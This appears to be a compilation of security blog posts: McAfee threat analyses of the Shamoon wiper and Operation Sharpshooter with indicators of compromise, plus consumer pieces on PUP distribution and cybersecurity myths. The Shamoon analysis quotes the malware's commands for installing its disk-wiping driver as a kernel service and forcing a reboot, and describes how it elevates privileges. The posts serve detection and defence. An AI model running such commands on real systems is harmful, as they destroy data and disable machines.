Shamoon is modular malware: The wiper component can be reused as a standalone file and weaponized in other attacks, making this threat a high risk. The post presents our findings, including a detailed analysis and indicators of compromise.


Shamoon is a dropper that carries three resources. The dropper is responsible for collecting data as well as embedding evasion techniques such as obfuscation, antidebugging, or antiforensic tricks. The dropper requires an argument to run.

It decrypts the three resources and installs them on the system in the %System% folder. It also creates the service MaintenaceSrv, which runs the wiper. The typo in the service name eases detection.

The Advanced Threat Research team has watched this service evolve over the years. The following tables highlight the differences:

The wiper uses ElRawDisk.sys to access the user’s raw disk and overwrites all data in all folders and disk sectors, causing a critical state of the infected machine before it finally reboots.

The result is either a blue screen or driver error that renders the machine unusable.



Executable summary

The dropper contains other malicious components masked as encrypted files embedded in PE section.

These resources are decrypted by the dropper and contain:

  • MNU: The communication module
  • LNG: The wiper component
  • PIC: The 64-bit version of the dropper

Shamoon 2018 needs an argument to run and infect machines. It decrypts several strings in memory that gather information on the system and determine whether to drop the 32-bit or 64-bit version.

It also drops the file (MD5: 41f8cd9ac3fb6b1771177e5770537518) in the folder c:\Windows\Temp\

The malware decrypts two files used later:

  • C:\Windows\inf\mdmnis5tQ1.pnf
  • C:\Windows\inf\averbh_noav.pnf

Shamoon enables the service RemoteRegistry, which allows a program to remotely modify the registry. It also disables remote user account control by enabling the registry key LocalAccountTokenFilterPolicy.

The malware checks whether the following shares exist to copy itself and spread:

  • ADMIN$

Shamoon queries the service to retrieve specific information related to the LocalService account.

It then retrieves the resources within the PE file to drop the components. Finding the location of the resource:

Shamoon creates the file and sets the time to August 2012 as an antiforensic trick. It puts this date on any file it can destroy.

The modification time can be used as an antiforensic trick to bypass detection based on the timeline, for example. We also observed that in some cases the date is briefly modified on the system, faking the date of each file. The files dropped on the system are stored in C:\\Windows\System32\.

Before creating the malicious service, Shamoon elevates its privilege by impersonating the token. It first uses LogonUser and ImpersonateLoggedOnUser, then ImpersonateNamedPipeClient. Metasploit uses a similar technique to elevate privileges.

Elevating privileges is critical for malware to perform additional system modifications, which are usually restricted.

Shamoon creates the new malicious service MaintenaceSrv. It creates the service with the option Autostart (StartType: 2) and runs the service with its own process (ServiceType: 0x10):

If the service is already created, it changes the configuration parameter of the service with the previous configuration.

It finally finishes creating MaintenaceSrv:

The wiper dropped on the system can have any one of the following names:



Next the wiper runs to destroy the data.


The wiper component is dropped into the System32 folder. It takes one parameter to run. The wiper driver is embedded in its resources.

We can see the encrypted resources, 101, in this screenshot:

The resource decrypted is the driver ElRawDisk.sys, which wipes the disk.

Extracting the resource:

This preceding file is not malicious but is considered risky because it is the original driver.

The wiper creates a service to run the driver with the following command:

sc create hdv_725x type= kernel start= demand binpath= WINDOWS\hdv_725x.sys 2>&1 >nul


The following screenshot shows the execution of this command:


The malware overwrites every file in c:\Windows\System32, placing the machine in a critical state. All the files on the system are overwritten.

The overwriting process:

Finally, it forces the reboot with the following command:

Shutdown -r -f -t 2


Once the system is rebooted it shows a blue screen:


The worm component is extracted from the resources from the dropper. Destructive malware usually uses spreading techniques to infect machines as quickly as possible.

The worm component can take the following names:

We noticed the capability to scan for the local network and connect to a potential control server:

Although the worm component can spread the dropper and connect to a remote server, the component was not used in this version.


Aside from the major destruction this malware can cause, the wiper component can be used independently from the dropper. The wiper does not have to rely on the main stub process. The 2018 Shamoon variant’s functionality indicates modular development. This enables the wiper to be used by malware droppers other than Shamoon.

Shamoon is showing signs of evolution; however, these advancements did not escape detection by McAfee DATs. We expect to see additional attacks in the Middle East (and beyond) by these adversaries. We will continue to monitor our telemetry and will update this analysis as we learn more.

MITRE ATT&CK™ matrix

Indicators of compromise

df177772518a8fcedbbc805ceed8daecc0f42fed                    Original dropper x86
ceb7876c01c75673699c74ff7fac64a5ca0e67a1                    Wiper
10411f07640edcaa6104f078af09e2543aa0ca07                   Worm module
bf3e0bc893859563811e9a481fde84fe7ecd0684                  RawDisk driver


McAfee detection

  • Trojan-Wiper!DE07C4AC94A5
  • RDN/Generic.dx
  • Trojan-Wiper

The post Shamoon Returns to Wipe Systems in Middle East, Europe appeared first on McAfee Blogs.

‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure

This post was written with contributions from the McAfee Advanced Threat Research team.  

The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group have discovered a new global campaign targeting nuclear, defense, energy, and financial companies, based on McAfee® Global Threat Intelligence. This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries.

Operation Sharpshooter’s numerous technical links to the Lazarus Group seem too obvious to immediately draw the conclusion that they are responsible for the attacks, and instead indicate a potential for false flags. Our research focuses on how this actor operates, the global impact, and how to detect the attack. We shall leave attribution to the broader security community.

Read our full analysis of Operation Sharpshooter.

Have we seen this before?

This campaign, while masquerading as legitimate industry job recruitment activity, gathers information to monitor for potential exploitation. Our analysis also indicates similar techniques associated with other job recruitment campaigns.

Global impact

In October and November 2018, the Rising Sun implant has appeared in 87 organizations across the globe, predominantly in the United States, based on McAfee telemetry and our analysis. Based on other campaigns with similar behavior, most of the targeted organizations are English speaking or have an English-speaking regional office. This actor has used recruiting as a lure to collect information about targeted individuals of interest or organizations that manage data related to the industries of interest. The McAfee Advanced Threat Research team has observed that the majority of targets were defense and government-related organizations.

Targeted organizations by sector in October 2018. Colors indicate the most prominently affected sector in each country. Source: McAfee® Global Threat Intelligence.

Infection flow of the Rising Sun implant, which eventually sends data to the attacker’s control servers.



Our discovery of this new, high-function implant is another example of how targeted attacks attempt to gain intelligence. The malware moves in several steps. The initial attack vector is a document that contains a weaponized macro to download the next stage, which runs in memory and gathers intelligence. The victim’s data is sent to a control server for monitoring by the actors, who then determine the next steps.

We have not previously observed this implant. Based on our telemetry, we discovered that multiple victims from different industry sectors around the world have reported these indicators.

Was this attack just a first-stage reconnaissance operation, or will there be more? We will continue to monitor this campaign and will report further when we or others in the security industry receive more information. The McAfee Advanced Threat Research team encourages our peers to share their insights and attribution of who is responsible for Operation Sharpshooter.


Indicators of compromise

MITRE ATT&CK™ techniques

  • Account discovery
  • File and directory discovery
  • Process discovery
  • System network configuration discovery
  • System information discovery
  • System network connections discovery
  • System time discovery
  • Automated exfiltration
  • Data encrypted
  • Exfiltration over command and control channel
  • Commonly used port
  • Process injection


  • 8106a30bd35526bded384627d8eebce15da35d17
  • 66776c50bcc79bbcecdbe99960e6ee39c8a31181
  • 668b0df94c6d12ae86711ce24ce79dbe0ee2d463
  • 9b0f22e129c73ce4c21be4122182f6dcbc351c95
  • 31e79093d452426247a56ca0eff860b0ecc86009

Control servers


Document URLs

  • hxxp:// Planning Manager.doc
  • hxxp:// Intelligence Administrator.doc
  • hxxp:// Service Representative.doc?dl=1

McAfee detection

  • RDN/Generic Downloader.x
  • Rising-Sun
  • Rising-Sun-DOC


The post ‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure appeared first on McAfee Blogs.

Software Company WakeNet AB Discovered Spreading PUPs to Users

Pay-per-install, or PPI for short, is a type of software program that presents users with third-party offers while they are in the middle of another download. If a user clicks on the third-party advertisement, the software developer earns money from the download. One specific PPI program has caught the attention of our McAfee ATR team, as they recently investigated a company that has taken advantage of this software and is using deceptive techniques to spread malicious files. Meet WakeNet AB, a Swedish pay-per-install software developer that has generated a large amount of revenue – even more so than some of the most prevalent ransomware families – from spreading PUPs (potentially unwanted programs).

So, how does WakeNet AB infect users’ devices with PUPs? WakeNet sets up PPI sites to entice affiliate hackers to spread malicious files and adware. WakeNet’s most recent distribution vessel is the site FileCapital. FileCapital provides affiliate hackers with a variety of “marketing tools” such as embedded movies, landing pages, banners, and buttons. These deceptive tools are intended to coax victims into installing bundled applications that house different PUPs. Victims may install these applications because they are disguised as legitimate programs. For example, a user may think they are installing a helpful performance cleaner onto their computer. What they don’t know is that the “performance cleaner” is actually disguising other malicious files that could lead to irritating adverts and decreased computer performance.

As of now, it seems unlikely that PUP development will slow since it helps their distributors earn a considerable amount of money. With that said, it’s important now more than ever for users to be aware of the security risks involved with PUPs like the ones spread by WakeNet’s FileCapital. Check out the following tips to better protect yourself from this threat:

  • Click with caution. Be wary of pop-ups and websites asking you to click on items like movie playbacks and other software downloads. These items could infect your device with annoying adverts and malware.
  • Only download software from trusted sources. If you receive a pop-up asking you to update or install software, be vigilant. Adware and PUPs are often disguised as legitimate sites or software companies. Your best bet is to play it safe and go directly to the source when updating or installing new software.
  • Use a robust security software. Using a security solution like McAfee Total Protection could help protect your device from exposure to PUPs that have been spread by WakeNet’s FileCapital. McAfee Total Protection blocks auto-play videos on websites that decrease computer performance and warns you of risky websites and links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Software Company WakeNet AB Discovered Spreading PUPs to Users appeared first on McAfee Blogs.

Busting 5 Cybersecurity Myths

It is not a secret that many people nowadays do not pay much attention when they surf the web at home or at work. There are new data breaches and exploits on a daily basis and still avoiding to take any precautions may result in a catastrophic consequences. Even the biggest corporations are paying millions of dollars so they can improve their cybersecurity and remain safe. However, if you still believe in some of the cybersecurity myths you may put your own computer or even your whole organization to a huge risk. We from CyberDB have decided to bust some of the top 5 cyber security myths and make it clear for you.

Only the IT department is responsible for cybersecurity

It is not wrong to say that the IT department is responsible to implement new processes and policies to keep the cybersecurity in a top notch state. However, they just don’t have a magic stick to protect all of the computers in the network. In reality each employee should be extremely careful when receiving and opening different e-mail messages from colleagues or third parties. It is dangerous since the infection can spread across all of the departments within the organization and this may cause a further data breach for example.

Using just an antivirus software is enough

Antivirus software might have been enough to safe your business from potential attack 20 years ago – nowadays it definitely is just not enough to protect your whole organization. Hackers find new ways to disable your antivirus and hide their attacks in the system. With ransomware gaining more popularity among hackers the time of getting infected and getting your information locked is just a matter of seconds. So using an antivirus is not always enough, but you also need to stay informed about the latest threats. Check out our database of cyber security vendors to find the best solution for your personal or business needs.

A strong password is enough

It is not a secret that having a long and complex password on your accounts is an essential. However, even big tech giants like Facebook or Apple experience data breaches and are pretty often a target for hackers. Every website requires you to create a strong password, but it is also good to use two-factor-authentication (2FA). At first the user was getting an SMS with a code for 2FA, but even this can be compromised by using a cloned sim card. So make sure you have an app like Google Authenticator for example to make your accounts more secure.

Threats are being spread only through the Internet

Some users may think that disconnecting from the internet will prevent the threats spreading around the network and they are completely wrong. Just imagine what happens if an employee brings an infected flash drive and plugs it in – all of the computers may become infected and your company may lose valuable information. You may have your information stolen even when you shop at a local retailer. So threats are not only online, but in our daily life and we need to be very careful and take care of our personal information.

Only certain industries experience cyber attacks

Some businesses still believe that they may be not targeted by hackers because they are a small or mid-sized business or in a specific industry. Well, they are completely wrong. Some companies also believe they do not have anything that hackers may find valuable to steal. In reality there is information like personal addresses or credit card numbers which can make every business in every industry a potential target. Here are the industries which are most vulnerable to cyber-attacks nowadays:

 Top 10 Sectors Breached

The post Busting 5 Cybersecurity Myths appeared first on CyberDB.